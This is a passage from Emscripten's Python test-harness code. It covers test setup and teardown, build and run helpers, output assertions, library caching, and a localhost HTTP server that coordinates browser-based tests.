opt_supports = any(opt in self.emcc_args for opt in ('-O2', '-O3', '-Os', '-Oz'))
return opt_supports
def set_temp_dir(self, temp_dir):
self.temp_dir = temp_dir
self.canonical_temp_dir = get_canonical_temp_dir(self.temp_dir)
# Explicitly set dedicated temporary directory for parallel tests
os.environ['EMCC_TEMP_DIR'] = self.temp_dir
@classmethod
def setUpClass(cls):
super(RunnerCore, cls).setUpClass()
print('(checking sanity from test runner)') # do this after we set env stuff
shared.check_sanity(force=True)
def setUp(self):
super(RunnerCore, self).setUp()
self.settings_mods = {}
self.emcc_args = ['-Werror']
self.node_args = []
self.v8_args = []
self.env = {}
self.temp_files_before_run = []
self.uses_es6 = False
self.js_engines = list(config.JS_ENGINES)
self.wasm_engines = list(config.WASM_ENGINES)
self.banned_js_engines = []
self.use_all_engines = EMTEST_ALL_ENGINES
if EMTEST_DETECT_TEMPFILE_LEAKS:
for root, dirnames, filenames in os.walk(self.temp_dir):
for dirname in dirnames:
self.temp_files_before_run.append(os.path.normpath(os.path.join(root, dirname)))
for filename in filenames:
self.temp_files_before_run.append(os.path.normpath(os.path.join(root, filename)))
if EMTEST_SAVE_DIR:
self.working_dir = os.path.join(self.temp_dir, 'emscripten_test')
if os.path.exists(self.working_dir):
if EMTEST_SAVE_DIR == 2:
print('Not clearing existing test directory')
else:
print('Clearing existing test directory')
# Even when EMTEST_SAVE_DIR we still try to start with an empty directoy as many tests
# expect this. EMTEST_SAVE_DIR=2 can be used to keep the old contents for the new test
# run. This can be useful when iterating on a given test with extra files you want to keep
# around in the output directory.
delete_contents(self.working_dir)
else:
print('Creating new test output directory')
ensure_dir(self.working_dir)
else:
self.working_dir = tempfile.mkdtemp(prefix='emscripten_test_' + self.__class__.__name__ + '_', dir=self.temp_dir)
os.chdir(self.working_dir)
if not EMTEST_SAVE_DIR:
self.has_prev_ll = False
for temp_file in os.listdir(TEMP_DIR):
if temp_file.endswith('.ll'):
self.has_prev_ll = True
def tearDown(self):
if not EMTEST_SAVE_DIR:
# rmtree() fails on Windows if the current working directory is inside the tree.
os.chdir(os.path.dirname(self.get_dir()))
try_delete(self.get_dir())
if EMTEST_DETECT_TEMPFILE_LEAKS and not DEBUG:
temp_files_after_run = []
for root, dirnames, filenames in os.walk(self.temp_dir):
for dirname in dirnames:
temp_files_after_run.append(os.path.normpath(os.path.join(root, dirname)))
for filename in filenames:
temp_files_after_run.append(os.path.normpath(os.path.join(root, filename)))
# Our leak detection will pick up *any* new temp files in the temp dir.
# They may not be due to us, but e.g. the browser when running browser
# tests. Until we figure out a proper solution, ignore some temp file
# names that we see on our CI infrastructure.
ignorable_file_prefixes = [
'/tmp/tmpaddon',
'/tmp/circleci-no-output-timeout',
'/tmp/wasmer'
]
left_over_files = set(temp_files_after_run) - set(self.temp_files_before_run)
left_over_files = [f for f in left_over_files if not any([f.startswith(prefix) for prefix in ignorable_file_prefixes])]
if len(left_over_files):
print('ERROR: After running test, there are ' + str(len(left_over_files)) + ' new temporary files/directories left behind:', file=sys.stderr)
for f in left_over_files:
print('leaked file: ' + f, file=sys.stderr)
self.fail('Test leaked ' + str(len(left_over_files)) + ' temporary files!')
def get_setting(self, key, default=None):
return self.settings_mods.get(key, default)
def set_setting(self, key, value=1):
if value is None:
self.clear_setting(key)
self.settings_mods[key] = value
def has_changed_setting(self, key):
return key in self.settings_mods
def clear_setting(self, key):
self.settings_mods.pop(key, None)
def serialize_settings(self):
ret = []
for key, value in self.settings_mods.items():
if value == 1:
ret += ['-s', key]
elif type(value) == str:
ret += ['-s', f'{key}={value}']
else:
ret += ['-s', f'{key}={json.dumps(value)}']
return ret
def get_dir(self):
return self.working_dir
def in_dir(self, *pathelems):
return os.path.join(self.get_dir(), *pathelems)
def add_pre_run(self, code):
create_file('prerun.js', 'Module.preRun = function() { %s }' % code)
self.emcc_args += ['--pre-js', 'prerun.js']
def add_post_run(self, code):
create_file('postrun.js', 'Module.postRun = function() { %s }' % code)
self.emcc_args += ['--pre-js', 'postrun.js']
def add_on_exit(self, code):
create_file('onexit.js', 'Module.onExit = function() { %s }' % code)
self.emcc_args += ['--pre-js', 'onexit.js']
# returns the full list of arguments to pass to emcc
# param @main_file whether this is the main file of the test. some arguments
# (like --pre-js) do not need to be passed when building
# libraries, for example
def get_emcc_args(self, main_file=False):
args = self.serialize_settings() + self.emcc_args
if not main_file:
for i, arg in enumerate(args):
if arg in ('--pre-js', '--post-js'):
args[i] = None
args[i + 1] = None
args = [arg for arg in args if arg is not None]
return args
def verify_es5(self, filename):
es_check = shared.get_npm_cmd('es-check')
# use --quiet once its available
# See: https://github.com/dollarshaveclub/es-check/pull/126/
es_check_env = os.environ.copy()
es_check_env['PATH'] = os.path.dirname(config.NODE_JS[0]) + os.pathsep + es_check_env['PATH']
try:
shared.run_process(es_check + ['es5', os.path.abspath(filename)], stderr=PIPE, env=es_check_env)
except subprocess.CalledProcessError as e:
print(e.stderr)
self.fail('es-check failed to verify ES5 output compliance')
# Build JavaScript code from source code
def build(self, filename, libraries=[], includes=[], force_c=False,
post_build=None, js_outfile=True):
suffix = '.js' if js_outfile else '.wasm'
if shared.suffix(filename) in ('.cc', '.cxx', '.cpp') and not force_c:
compiler = [EMXX]
else:
# TODO(https://github.com/emscripten-core/emscripten/issues/11121)
# We link with C++ stdlibs, even when linking with emcc for historical reasons. We can remove
# this if this issues is fixed.
compiler = [EMCC, '-nostdlib++']
if force_c:
compiler.append('-xc')
dirname, basename = os.path.split(filename)
output = shared.unsuffixed(basename) + suffix
cmd = compiler + [filename, '-o', output] + self.get_emcc_args(main_file=True) + libraries
if shared.suffix(filename) not in ('.i', '.ii'):
# Add the location of the test file to include path.
cmd += ['-I.']
cmd += ['-I' + include for include in includes]
self.run_process(cmd, stderr=self.stderr_redirect if not DEBUG else None)
self.assertExists(output)
if js_outfile and not self.uses_es6:
self.verify_es5(output)
if post_build:
post_build(output)
if js_outfile and self.uses_memory_init_file():
src = open(output).read()
# side memory init file, or an empty one in the js
assert ('/* memory initializer */' not in src) or ('/* memory initializer */ allocate([]' in src)
return output
def get_func(self, src, name):
start = src.index('function ' + name + '(')
t = start
n = 0
while True:
if src[t] == '{':
n += 1
elif src[t] == '}':
n -= 1
if n == 0:
return src[start:t + 1]
t += 1
assert t < len(src)
def count_funcs(self, javascript_file):
num_funcs = 0
start_tok = "// EMSCRIPTEN_START_FUNCS"
end_tok = "// EMSCRIPTEN_END_FUNCS"
start_off = 0
end_off = 0
with open(javascript_file, 'rt') as f:
blob = "".join(f.readlines())
start_off = blob.find(start_tok) + len(start_tok)
end_off = blob.find(end_tok)
asm_chunk = blob[start_off:end_off]
num_funcs = asm_chunk.count('function ')
return num_funcs
def count_wasm_contents(self, wasm_binary, what):
out = self.run_process([os.path.join(building.get_binaryen_bin(), 'wasm-opt'), wasm_binary, '--metrics'], stdout=PIPE).stdout
# output is something like
# [?] : 125
for line in out.splitlines():
if '[' + what + ']' in line:
ret = line.split(':')[1].strip()
return int(ret)
self.fail('Failed to find [%s] in wasm-opt output' % what)
def get_wasm_text(self, wasm_binary):
return self.run_process([os.path.join(building.get_binaryen_bin(), 'wasm-dis'), wasm_binary], stdout=PIPE).stdout
def is_exported_in_wasm(self, name, wasm):
wat = self.get_wasm_text(wasm)
return ('(export "%s"' % name) in wat
def run_js(self, filename, engine=None, args=[], output_nicerizer=None, assert_returncode=0):
# use files, as PIPE can get too full and hang us
stdout = self.in_dir('stdout')
stderr = self.in_dir('stderr')
error = None
if not engine:
engine = config.JS_ENGINES[0]
if engine == config.NODE_JS:
engine = engine + self.node_args
if engine == config.V8_ENGINE:
engine = engine + self.v8_args
if EMTEST_VERBOSE:
print(f"Running '{filename}' under '{shared.shlex_join(engine)}'")
try:
jsrun.run_js(filename, engine, args,
stdout=open(stdout, 'w'),
stderr=open(stderr, 'w'),
assert_returncode=assert_returncode)
except subprocess.CalledProcessError as e:
error = e
# Make sure that we produced proper line endings to the .js file we are about to run.
if not filename.endswith('.wasm'):
self.assertEqual(line_endings.check_line_endings(filename), 0)
out = open(stdout, 'r').read()
err = open(stderr, 'r').read()
if output_nicerizer:
ret = output_nicerizer(out, err)
else:
ret = out + err
if error or EMTEST_VERBOSE:
ret = limit_size(ret)
print('-- begin program output --')
print(ret, end='')
print('-- end program output --')
if error:
if assert_returncode == NON_ZERO:
self.fail('JS subprocess unexpectedly succeeded (%s): Output:\n%s' % (error.cmd, ret))
else:
self.fail('JS subprocess failed (%s): %s. Output:\n%s' % (error.cmd, error.returncode, ret))
# We should pass all strict mode checks
self.assertNotContained('strict warning:', ret)
return ret
def assertExists(self, filename, msg=None):
if not msg:
msg = 'Expected file not found: ' + filename
self.assertTrue(os.path.exists(filename), msg)
def assertNotExists(self, filename, msg=None):
if not msg:
msg = 'Unexpected file exists: ' + filename
self.assertFalse(os.path.exists(filename), msg)
# Tests that the given two paths are identical, modulo path delimiters. E.g. "C:/foo" is equal to "C:\foo".
def assertPathsIdentical(self, path1, path2):
path1 = path1.replace('\\', '/')
path2 = path2.replace('\\', '/')
return self.assertIdentical(path1, path2)
# Tests that the given two multiline text content are identical, modulo line
# ending differences (\r\n on Windows, \n on Unix).
def assertTextDataIdentical(self, text1, text2, msg=None,
fromfile='expected', tofile='actual'):
text1 = text1.replace('\r\n', '\n')
text2 = text2.replace('\r\n', '\n')
return self.assertIdentical(text1, text2, msg, fromfile, tofile)
def assertIdentical(self, values, y, msg=None,
fromfile='expected', tofile='actual'):
if type(values) not in (list, tuple):
values = [values]
for x in values:
if x == y:
return # success
diff_lines = difflib.unified_diff(x.splitlines(), y.splitlines(),
fromfile=fromfile, tofile=tofile)
diff = ''.join([a.rstrip() + '\n' for a in diff_lines])
if EMTEST_VERBOSE:
print("Expected to have '%s' == '%s'" % (limit_size(values[0]), limit_size(y)))
fail_message = 'Unexpected difference:\n' + limit_size(diff)
if not EMTEST_VERBOSE:
fail_message += '\nFor full output run with EMTEST_VERBOSE=1.'
if msg:
fail_message += '\n' + msg
self.fail(fail_message)
def assertTextDataContained(self, text1, text2):
text1 = text1.replace('\r\n', '\n')
text2 = text2.replace('\r\n', '\n')
return self.assertContained(text1, text2)
def assertContained(self, values, string, additional_info=''):
if type(values) not in [list, tuple]:
values = [values]
if callable(string):
string = string()
if not any(v in string for v in values):
diff = difflib.unified_diff(values[0].split('\n'), string.split('\n'), fromfile='expected', tofile='actual')
diff = ''.join(a.rstrip() + '\n' for a in diff)
self.fail("Expected to find '%s' in '%s', diff:\n\n%s\n%s" % (
limit_size(values[0]), limit_size(string), limit_size(diff),
additional_info
))
def assertNotContained(self, value, string):
if callable(value):
value = value() # lazy loading
if callable(string):
string = string()
if value in string:
self.fail("Expected to NOT find '%s' in '%s', diff:\n\n%s" % (
limit_size(value), limit_size(string),
limit_size(''.join([a.rstrip() + '\n' for a in difflib.unified_diff(value.split('\n'), string.split('\n'), fromfile='expected', tofile='actual')]))
))
def assertContainedIf(self, value, string, condition):
if condition:
self.assertContained(value, string)
else:
self.assertNotContained(value, string)
def assertBinaryEqual(self, file1, file2):
self.assertEqual(os.path.getsize(file1),
os.path.getsize(file2))
self.assertEqual(open(file1, 'rb').read(),
open(file2, 'rb').read())
library_cache = {}
def get_build_dir(self):
ret = os.path.join(self.get_dir(), 'building')
ensure_dir(ret)
return ret
def get_library(self, name, generated_libs, configure=['sh', './configure'],
configure_args=[], make=['make'], make_args=None,
env_init={}, cache_name_extra='', native=False):
if make_args is None:
make_args = ['-j', str(shared.get_num_cores())]
build_dir = self.get_build_dir()
output_dir = self.get_dir()
emcc_args = self.get_emcc_args()
hash_input = (str(emcc_args) + ' $ ' + str(env_init)).encode('utf-8')
cache_name = name + ','.join([opt for opt in emcc_args if len(opt) < 7]) + '_' + hashlib.md5(hash_input).hexdigest() + cache_name_extra
valid_chars = "_%s%s" % (string.ascii_letters, string.digits)
cache_name = ''.join([(c if c in valid_chars else '_') for c in cache_name])
if self.library_cache.get(cache_name):
print('<load %s from cache> ' % cache_name, file=sys.stderr)
generated_libs = []
for basename, contents in self.library_cache[cache_name]:
bc_file = os.path.join(build_dir, cache_name + '_' + basename)
with open(bc_file, 'wb') as f:
f.write(contents)
generated_libs.append(bc_file)
return generated_libs
print(f'<building and saving {cache_name} into cache>', file=sys.stderr)
if configure is not None:
# Avoid += so we don't mutate the default arg
configure = configure + configure_args
return build_library(name, build_dir, output_dir, generated_libs, configure,
make, make_args, self.library_cache,
cache_name, env_init=env_init, native=native, cflags=self.get_emcc_args())
def clear(self):
delete_contents(self.get_dir())
if EMSCRIPTEN_TEMP_DIR:
delete_contents(EMSCRIPTEN_TEMP_DIR)
def run_process(self, cmd, check=True, **args):
# Wrapper around shared.run_process. This is desirable so that the tests
# can fail (in the unittest sense) rather than error'ing.
# In the long run it would nice to completely remove the dependency on
# core emscripten code (shared.py) here.
try:
return shared.run_process(cmd, check=check, **args)
except subprocess.CalledProcessError as e:
if check and e.returncode != 0:
self.fail('subprocess exited with non-zero return code(%d): `%s`' %
(e.returncode, shared.shlex_join(cmd)))
# Shared test code between main suite and others
def expect_fail(self, cmd, **args):
"""Run a subprocess and assert that it returns non-zero.
Return the stderr of the subprocess.
"""
proc = self.run_process(cmd, check=False, stderr=PIPE, **args)
self.assertNotEqual(proc.returncode, 0, 'subprocess unexpectedly succeeded. stderr:\n' + proc.stderr)
# When we check for failure we expect a user-visible error, not a traceback.
# However, on windows a python traceback can happen randomly sometimes,
# due to "Access is denied" https://github.com/emscripten-core/emscripten/issues/718
if not WINDOWS or 'Access is denied' not in proc.stderr:
self.assertNotContained('Traceback', proc.stderr)
return proc.stderr
# excercise dynamic linker.
#
# test that linking to shared library B, which is linked to A, loads A as well.
# main is also linked to C, which is also linked to A. A is loaded/initialized only once.
#
# B
# main < > A
# C
#
# this test is used by both test_core and test_browser.
# when run under broswer it excercises how dynamic linker handles concurrency
# - because B and C are loaded in parallel.
def _test_dylink_dso_needed(self, do_run):
create_file('liba.cpp', r'''
#include <stdio.h>
#include <emscripten.h>
static const char *afunc_prev;
extern "C" {
EMSCRIPTEN_KEEPALIVE void afunc(const char *s);
}
void afunc(const char *s) {
printf("a: %s (prev: %s)\n", s, afunc_prev);
afunc_prev = s;
}
struct ainit {
ainit() {
puts("a: loaded");
}
};
static ainit _;
''')
create_file('libb.cpp', r'''
#include <emscripten.h>
extern "C" {
void afunc(const char *s);
EMSCRIPTEN_KEEPALIVE void bfunc();
}
void bfunc() {
afunc("b");
}
''')
create_file('libc.cpp', r'''
#include <emscripten.h>
extern "C" {
void afunc(const char *s);
EMSCRIPTEN_KEEPALIVE void cfunc();
}
void cfunc() {
afunc("c");
}
''')
# _test_dylink_dso_needed can be potentially called several times by a test.
# reset dylink-related options first.
self.clear_setting('MAIN_MODULE')
self.clear_setting('SIDE_MODULE')
# XXX in wasm each lib load currently takes 5MB; default INITIAL_MEMORY=16MB is thus not enough
self.set_setting('INITIAL_MEMORY', '32mb')
so = '.wasm' if self.is_wasm() else '.js'
def ccshared(src, linkto=[]):
cmdv = [EMCC, src, '-o', shared.unsuffixed(src) + so, '-s', 'SIDE_MODULE'] + self.get_emcc_args()
cmdv += linkto
self.run_process(cmdv)
ccshared('liba.cpp')
ccshared('libb.cpp', ['liba' + so])
ccshared('libc.cpp', ['liba' + so])
self.set_setting('MAIN_MODULE')
original_args = list(self.emcc_args)
extra_args = ['libb' + so, 'libc' + so]
self.emcc_args += extra_args
do_run(r'''
#ifdef __cplusplus
extern "C" {
#endif
void bfunc();
void cfunc();
#ifdef __cplusplus
}
#endif
int test_main() {
bfunc();
cfunc();
return 0;
}
''',
'a: loaded\na: b (prev: (null))\na: c (prev: b)\n')
self.emcc_args = original_args
for libname in ['liba', 'libb', 'libc']:
self.emcc_args += ['--embed-file', libname + so]
do_run(r'''
#include <assert.h>
#include <dlfcn.h>
#include <stddef.h>
int test_main() {
void *bdso, *cdso;
void (*bfunc)(), (*cfunc)();
// FIXME for RTLD_LOCAL binding symbols to loaded lib is not currently working
bdso = dlopen("libb%(so)s", RTLD_NOW|RTLD_GLOBAL);
assert(bdso != NULL);
cdso = dlopen("libc%(so)s", RTLD_NOW|RTLD_GLOBAL);
assert(cdso != NULL);
bfunc = (void (*)())dlsym(bdso, "bfunc");
assert(bfunc != NULL);
cfunc = (void (*)())dlsym(cdso, "cfunc");
assert(cfunc != NULL);
bfunc();
cfunc();
return 0;
}
''' % locals(),
'a: loaded\na: b (prev: (null))\na: c (prev: b)\n')
def filtered_js_engines(self, js_engines=None):
if js_engines is None:
js_engines = self.js_engines
for engine in js_engines:
assert engine in config.JS_ENGINES, "js engine does not exist in config.JS_ENGINES"
assert type(engine) == list
for engine in self.banned_js_engines:
assert type(engine) in (list, type(None))
banned = [b[0] for b in self.banned_js_engines if b]
return [engine for engine in js_engines if engine and engine[0] not in banned]
def do_run(self, src, expected_output, force_c=False, **kwargs):
if 'no_build' in kwargs:
filename = src
else:
if force_c:
filename = 'src.c'
else:
filename = 'src.cpp'
with open(filename, 'w') as f:
f.write(src)
self._build_and_run(filename, expected_output, **kwargs)
def do_runf(self, filename, expected_output=None, **kwargs):
self._build_and_run(filename, expected_output, **kwargs)
## Just like `do_run` but with filename of expected output
def do_run_from_file(self, filename, expected_output_filename, **kwargs):
self._build_and_run(filename, open(expected_output_filename).read(), **kwargs)
def do_run_in_out_file_test(self, *path, **kwargs):
srcfile = test_file(*path)
outfile = shared.unsuffixed(srcfile) + '.out'
expected = open(outfile).read()
self._build_and_run(srcfile, expected, **kwargs)
## Does a complete test - builds, runs, checks output, etc.
def _build_and_run(self, filename, expected_output, args=[], output_nicerizer=None,
no_build=False,
js_engines=None, post_build=None, libraries=[],
includes=[],
assert_returncode=0, assert_identical=False, assert_all=False,
check_for_error=True, force_c=False):
logger.debug(f'_build_and_run: {filename}')
if no_build:
js_file = filename
else:
self.build(filename, libraries=libraries, includes=includes, post_build=post_build,
force_c=force_c)
js_file = shared.unsuffixed(os.path.basename(filename)) + '.js'
self.assertExists(js_file)
engines = self.filtered_js_engines(js_engines)
if len(engines) > 1 and not self.use_all_engines:
engines = engines[:1]
# In standalone mode, also add wasm vms as we should be able to run there too.
if self.get_setting('STANDALONE_WASM'):
# TODO once standalone wasm support is more stable, apply use_all_engines
# like with js engines, but for now as we bring it up, test in all of them
if not self.wasm_engines:
logger.warning('no wasm engine was found to run the standalone part of this test')
engines += self.wasm_engines
if self.get_setting('WASM2C') and not EMTEST_LACKS_NATIVE_CLANG:
# compile the c file to a native executable.
c = shared.unsuffixed(js_file) + '.wasm.c'
executable = shared.unsuffixed(js_file) + '.exe'
cmd = [shared.CLANG_CC, c, '-o', executable] + clang_native.get_clang_native_args()
self.run_process(cmd, env=clang_native.get_clang_native_env())
# we can now run the executable directly, without an engine, which
# we indicate with None as the engine
engines += [[None]]
if len(engines) == 0:
self.skipTest('No JS engine present to run this test with. Check %s and the paths therein.' % config.EM_CONFIG)
for engine in engines:
js_output = self.run_js(js_file, engine, args, output_nicerizer=output_nicerizer, assert_returncode=assert_returncode)
js_output = js_output.replace('\r\n', '\n')
if expected_output:
try:
if assert_identical:
self.assertIdentical(expected_output, js_output)
elif assert_all:
for o in expected_output:
self.assertContained(o, js_output)
else:
self.assertContained(expected_output, js_output)
if check_for_error:
self.assertNotContained('ERROR', js_output)
except Exception:
print('(test did not pass in JS engine: %s)' % engine)
raise
def get_freetype_library(self):
if '-Werror' in self.emcc_args:
self.emcc_args.remove('-Werror')
return self.get_library(os.path.join('third_party', 'freetype'), os.path.join('objs', '.libs', 'libfreetype.a'), configure_args=['--disable-shared', '--without-zlib'])
def get_poppler_library(self, env_init=None):
# The fontconfig symbols are all missing from the poppler build
# e.g. FcConfigSubstitute
self.set_setting('ERROR_ON_UNDEFINED_SYMBOLS', 0)
self.emcc_args += [
'-I' + test_file('third_party', 'freetype', 'include'),
'-I' + test_file('third_party', 'poppler', 'include')
]
freetype = self.get_freetype_library()
# Poppler has some pretty glaring warning. Suppress them to keep the
# test output readable.
if '-Werror' in self.emcc_args:
self.emcc_args.remove('-Werror')
self.emcc_args += [
'-Wno-sentinel',
'-Wno-logical-not-parentheses',
'-Wno-unused-private-field',
'-Wno-tautological-compare',
'-Wno-unknown-pragmas',
]
env_init = env_init.copy() if env_init else {}
env_init['FONTCONFIG_CFLAGS'] = ' '
env_init['FONTCONFIG_LIBS'] = ' '
poppler = self.get_library(
os.path.join('third_party', 'poppler'),
[os.path.join('utils', 'pdftoppm.o'), os.path.join('utils', 'parseargs.o'), os.path.join('poppler', '.libs', 'libpoppler.a')],
env_init=env_init,
configure_args=['--disable-libjpeg', '--disable-libpng', '--disable-poppler-qt', '--disable-poppler-qt4', '--disable-cms', '--disable-cairo-output', '--disable-abiword-output', '--disable-shared'])
return poppler + freetype
def get_zlib_library(self):
if WINDOWS:
return self.get_library(os.path.join('third_party', 'zlib'), os.path.join('libz.a'),
configure=['cmake', '.'],
make=['cmake', '--build', '.'],
make_args=[])
return self.get_library(os.path.join('third_party', 'zlib'), os.path.join('libz.a'), make_args=['libz.a'])
# Run a server and a web page. When a test runs, we tell the server about it,
# which tells the web page, which then opens a window with the test. Doing
# it this way then allows the page to close() itself when done.
def harness_server_func(in_queue, out_queue, port):
class TestServerHandler(SimpleHTTPRequestHandler):
# Request header handler for default do_GET() path in
# SimpleHTTPRequestHandler.do_GET(self) below.
def send_head(self):
if self.path.endswith('.js'):
path = self.translate_path(self.path)
try:
f = open(path, 'rb')
except IOError:
self.send_error(404, "File not found: " + path)
return None
self.send_response(200)
self.send_header('Content-type', 'application/javascript')
self.send_header('Connection', 'close')
self.end_headers()
return f
else:
return SimpleHTTPRequestHandler.send_head(self)
# Add COOP, COEP, CORP, and no-caching headers
def end_headers(self):
self.send_header('Access-Control-Allow-Origin', '*')
self.send_header('Cross-Origin-Opener-Policy', 'same-origin')
self.send_header('Cross-Origin-Embedder-Policy', 'require-corp')
self.send_header('Cross-Origin-Resource-Policy', 'cross-origin')
self.send_header('Cache-Control', 'no-cache, no-store, must-revalidate')
return SimpleHTTPRequestHandler.end_headers(self)
def do_GET(self):
if self.path == '/run_harness':
if DEBUG:
print('[server startup]')
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
self.wfile.write(open(test_file('browser_harness.html'), 'rb').read())
elif 'report_' in self.path:
# the test is reporting its result. first change dir away from the
# test dir, as it will be deleted now that the test is finishing, and
# if we got a ping at that time, we'd return an error
os.chdir(path_from_root())
# for debugging, tests may encode the result and their own url (window.location) as result|url
if '|' in self.path:
path, url = self.path.split('|', 1)
else:
path = self.path
url = '?'
if DEBUG:
print('[server response:', path, url, ']')
if out_queue.empty():
out_queue.put(path)
else:
# a badly-behaving test may send multiple xhrs with reported results; we just care
# about the first (if we queued the others, they might be read as responses for
# later tests, or maybe the test sends more than one in a racy manner).
# we place 'None' in the queue here so that the outside knows something went wrong
# (none is not a valid value otherwise; and we need the outside to know because if we
# raise an error in here, it is just swallowed in python's webserver code - we want
# the test to actually fail, which a webserver response can't do).
out_queue.put(None)
raise Exception('browser harness error, excessive response to server - test must be fixed! "%s"' % self.path)
self.send_response(200)
self.send_header('Content-type', 'text/plain')
self.send_header('Cache-Control', 'no-cache, must-revalidate')
self.send_header('Connection', 'close')
self.send_header('Expires', '-1')
self.end_headers()
self.wfile.write(b'OK')
elif 'stdout=' in self.path or 'stderr=' in self.path or 'exception=' in self.path:
'''
To get logging to the console from browser tests, add this to
print/printErr/the exception handler in src/shell.html:
var xhr = new XMLHttpRequest();
xhr.open('GET', encodeURI('http://localhost:8888?stdout=' + text));
xhr.send();
'''
print('[client logging:', unquote_plus(self.path), ']')
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
elif self.path == '/check':
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
if not in_queue.empty():
# there is a new test ready to be served
url, dir = in_queue.get()
if DEBUG:
print('[queue command:', url, dir, ']')
assert in_queue.empty(), 'should not be any blockage - one test runs at a time'
assert out_queue.empty(), 'the single response from the last test was read'
# tell the browser to load the test
self.wfile.write(b'COMMAND:' + url.encode('utf-8'))
# move us to the right place to serve the files for the new test
os.chdir(dir)
else:
# the browser must keep polling
self.wfile.write(b'(wait)')
else:
# Use SimpleHTTPServer default file serving operation for GET.
if DEBUG:
print('[simple HTTP serving:', unquote_plus(self.path), ']')
SimpleHTTPRequestHandler.do_GET(self)
def log_request(code=0, size=0):
# don't log; too noisy
pass
# allows streaming compilation to work
SimpleHTTPRequestHandler.extensions_map['.wasm'] = 'application/wasm'
httpd = HTTPServer(('localhost', port), TestServerHandler)
httpd.serve_forever() # test runner will kill us
class Reporting(Enum):
"""When running browser tests we normally automatically include support
code for reporting results back to the browser. This enum allows tests
to decide what type of support code they need/want.
"""
NONE = 0
# Include the JS helpers for reporting results
JS_ONLY = 1
# Include C/C++ reporting code (REPORT_RESULT mactros) as well as JS helpers
FULL = 2
class BrowserCore(RunnerCore):
# note how many tests hang / do not send an output. if many of these
# happen, likely something is broken and it is best to abort the test
# suite early, as otherwise we will wait for the timeout on every
# single test (hundreds of minutes)
MAX_UNRESPONSIVE_TESTS = 10
unresponsive_tests = 0
def __init__(self, *args, **kwargs):
super(BrowserCore, self).__init__(*args, **kwargs)
@staticmethod
def browser_open(url):
if not EMTEST_BROWSER:
logger.info('Using default system browser')
webbrowser.open_new(url)
return
browser_args = shlex.split(EMTEST_BROWSER)
# If the given browser is a scalar, treat it like one of the possible types
# from https://docs.python.org/2/library/webbrowser.html
if len(browser_args) == 1:
try:
# This throws if the type of browser isn't available
webbrowser.get(browser_args[0]).open_new(url)
logger.info('Using Emscripten browser: %s', browser_args[0])
return
except webbrowser.Error:
# Ignore the exception and fallback to the custom command logic
pass
# Else assume the given browser is a specific program with additional
# parameters and delegate to that
logger.info('Using Emscripten browser: %s', str(browser_args))
subprocess.Popen(browser_args + [url])
@classmethod
def setUpClass(cls):
super(BrowserCore, cls).setUpClass()
cls.also_asmjs = int(os.getenv('EMTEST_BROWSER_ALSO_ASMJS', '0')) == 1
cls.port = int(os.getenv('EMTEST_BROWSER_PORT', '8888'))
if not has_browser():
return
cls.browser_timeout = 60
cls.harness_in_queue = multiprocessing.Queue()
cls.harness_out_queue = multiprocessing.Queue()
cls.harness_server = multiprocessing.Process(target=harness_server_func, args=(cls.harness_in_queue, cls.harness_out_queue, cls.port))
cls.harness_server.start()
print('[Browser harness server on process %d]' % cls.harness_server.pid)
cls.browser_open('http://localhost:%s/run_harness' % cls.port)
@classmethod
def tearDownClass(cls):
super(BrowserCore, cls).tearDownClass()
if not has_browser():
return
cls.harness_server.terminate()
print('[Browser harness server terminated]')
if WINDOWS:
# On Windows, shutil.rmtree() in tearDown() raises this exception if we do not wait a bit:
# WindowsError: [Error 32] The process cannot access the file because it is being used by another process.
time.sleep(0.1)
def assert_out_queue_empty(self, who):
if not self.harness_out_queue.empty():
while not self.harness_out_queue.empty():
self.harness_out_queue.get()
raise Exception('excessive responses from %s' % who)
# @param extra_tries: how many more times to try this test, if it fails. browser tests have
# many more causes of flakiness (in particular, they do not run
# synchronously, so we have a timeout, which can be hit if the VM
# we run on stalls temporarily), so we let each test try more than
# once by default
def run_browser(self, html_file, message, expectedResult=None, timeout=None, extra_tries=1):
if not has_browser():
return
if BrowserCore.unresponsive_tests >= BrowserCore.MAX_UNRESPONSIVE_TESTS:
self.skipTest('too many unresponsive tests, skipping browser launch - check your setup!')
self.assert_out_queue_empty('previous test')
if DEBUG:
print('[browser launch:', html_file, ']')
if expectedResult is not None:
try:
self.harness_in_queue.put((
'http://localhost:%s/%s' % (self.port, html_file),
self.get_dir()
))
received_output = False
output = '[no http server activity]'
start = time.time()
if timeout is None:
timeout = self.browser_timeout
while time.time() - start < timeout:
if not self.harness_out_queue.empty():
output = self.harness_out_queue.get()
received_output = True
break
time.sleep(0.1)
if not received_output:
BrowserCore.unresponsive_tests += 1
print('[unresponsive tests: %d]' % BrowserCore.unresponsive_tests)
if output is None:
# the browser harness reported an error already, and sent a None to tell
# us to also fail the test
raise Exception('failing test due to browser harness error')
if output.startswith('/report_result?skipped:'):
self.skipTest(unquote(output[len('/report_result?skipped:'):]).strip())
else:
# verify the result, and try again if we should do so
output = unquote(output)
try:
self.assertContained(expectedResult, output)
except Exception as e:
if extra_tries > 0:
print('[test error (see below), automatically retrying]')
print(e)
return self.run_browser(html_file, message, expectedResult, timeout, extra_tries - 1)
else:
raise e
finally:
time.sleep(0.1) # see comment about Windows above
self.assert_out_queue_empty('this test')
else:
webbrowser.open_new(os.path.abspath(html_file))
print('A web browser window should have opened a page containing the results of a part of this test.')
print('You need to manually look at the page to see that it works ok: ' + message)
print('(sleeping for a bit to keep the directory alive for the web browser..)')
time.sleep(5)
print('(moving on..)')
# @manually_trigger If set, we do not assume we should run the reftest when main() is done.
# Instead, call doReftest() in JS yourself at the right time.
def reftest(self, expected, manually_trigger=False):
# make sure the pngs used here have no color correction, using e.g.
# pngcrush -rem gAMA -rem cHRM -rem iCCP -rem sRGB infile outfile
basename = os.path.basename(expected)
shutil.copyfile(expected, os.path.join(self.get_dir(), basename))
with open('reftest.js', 'w') as out:
with open(test_file('browser_reporting.js')) as reporting:
out.write('''
function doReftest() {
if (doReftest.done) return;
doReftest.done = true;
var img = new Image();
img.onload = function() {
assert(img.width == Module.canvas.width, 'Invalid width: ' + Module.canvas.width + ', should be ' + img.width);
assert(img.height == Module.canvas.height, 'Invalid height: ' + Module.canvas.height + ', should be ' + img.height);
var canvas = document.createElement('canvas');
canvas.width = img.width;
canvas.height = img.height;
var ctx = canvas.getContext('2d');
ctx.drawImage(img, 0, 0);
var expected = ctx.getImageData(0, 0, img.width, img.height).data;
